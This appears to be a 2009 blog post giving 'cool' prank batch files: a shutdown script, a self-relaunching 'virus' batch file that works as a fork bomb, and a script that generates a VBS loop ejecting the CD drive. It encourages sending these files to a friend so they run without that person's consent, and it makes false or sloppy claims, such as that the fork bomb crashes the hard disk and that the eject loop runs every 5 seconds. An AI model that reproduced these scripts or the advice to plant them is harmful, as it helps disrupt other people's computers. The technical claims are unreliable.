Batch files

22/09/2009 20:55

 

cool batch files!!

Shut down your computer in single click !!

1) Open notepad

2) Type   "shutdown -s" without double quotes

3) Save file as shutdown.bat

4) A batch file will be created if you open that file your computer shuts down!!!

Create virus !!

1) Open notepad

2) Type in the code

       start virus.bat

        virus.bat

3) Save file as virus.bat

       If anyone opens that file an infinite command prompts will open and the hard disk crashes!!!!  

Batch file which opens and closes your cd drive foe every 5 seconds !!

1) Open notepad

2) Copy this code

 echo Do >> "opendisk.vbs"

 echo Set oWMP = CreateObject("WMPlayer.OCX.7" ) >> "opendisk.vbs"

 echo Set colCDROMs = oWMP.cdromCollection >> "opendisk.vbs"

 echo colCDROMs.Item(d).Eject >> "opendisk.vbs"

 echo colCDROMs.Item(d).Eject >> "opendisk.vbs"

 echo Loop >> "opendisk.vbs"

 start "" "opendisk.vbs"

3) Save file as drive.bat..if anyone opens this file the cd drive will open and closes for every 5 seconds...

    if we send this file to your frnd if he opens it his cd rom will open for every 5 secs!!!

         

      

Back